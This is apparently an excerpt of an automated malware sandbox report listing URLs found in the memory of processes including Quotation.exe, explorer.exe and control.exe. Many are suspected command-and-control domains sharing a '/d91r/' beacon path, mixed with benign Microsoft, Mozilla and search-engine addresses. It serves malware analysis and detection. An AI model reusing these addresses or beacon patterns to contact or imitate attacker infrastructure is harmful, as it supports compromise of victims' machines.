        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014FA0000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000006600000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.comwww.eta-trader.net
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.comwww.184411.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cactus-market.ru
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cactus-market.ru/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cactus-market.ruwww.qx386.top
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.comL$www.flaviosilva.online
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.comwww.flaviosilva.online
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.decoraptor.store
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.decoraptor.store/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.decoraptor.store/d91r/_w7xz=bR5Glu
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyzwww.finelinetackdirect.com
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.netwww.funvacayflorida.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.comwww.maxhaidt.com
        Source: explorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.online
        Source: explorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.online/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.onlinewww.solya-shop.com
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com
        Source: control.exe, 0000000D.00000002.26417273951.0000000007370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPsRxvfaRVW9F5TaX
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.netwww.aznqmd.com
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ru
        Source: explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ru/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ruwww.cardinialethanol.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.julesgifts.co.uk
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.julesgifts.co.uk/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.julesgifts.co.ukwww.aznqmd.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014958000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005FB8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.ghostdyes.net
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.julesgifts.co.uk
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://www.nero.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.top
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.top/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.top/d91r/_w7xz=bR5Glu
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.topwww.rt66omm.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.comwww.decoraptor.store
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.comwww.buymyenergy.com
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://www.symauth.com/cps0(
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://www.symauth.com/rpa00
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014E0E000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000646E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.comwww.brightfms.com
        Source: Quotation.exe, 0000000A.00000001.21847480465.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Quotation.exe, 0000000A.00000001.21847480465.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: explorer.exe, 0000000C.00000003.23178684870.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CFE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppz
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
        Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.drString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: explorer.exe, 0000000C.00000002.26418329458.0000000008F53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm3
        Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS0Q#
        Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSF
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/?Im
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000C.00000002.26441286993.00000000100A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22672138178.00000000100A6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?9l
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
        Source: explorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000C.00000000.22642464266.0000000002B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132472100.0000000002B4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171896969.0000000002B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26408426098.0000000002B4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014634000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005C94000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
        Source: Quotation.exe, SolutionExplorerCLI.dll.1.drString found in binary or memory: https://d.symcb.com/cps0%
        Source: Quotation.exe, SolutionExplorerCLI.dll.1.drString found in binary or memory: https://d.symcb.com/rpa0
        Source: Quotation.exeString found in binary or memory: https://d.symcb.com/rpa0.
        Source: explorer.exe, 0000000C.00000000.22673664093.000000001021C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
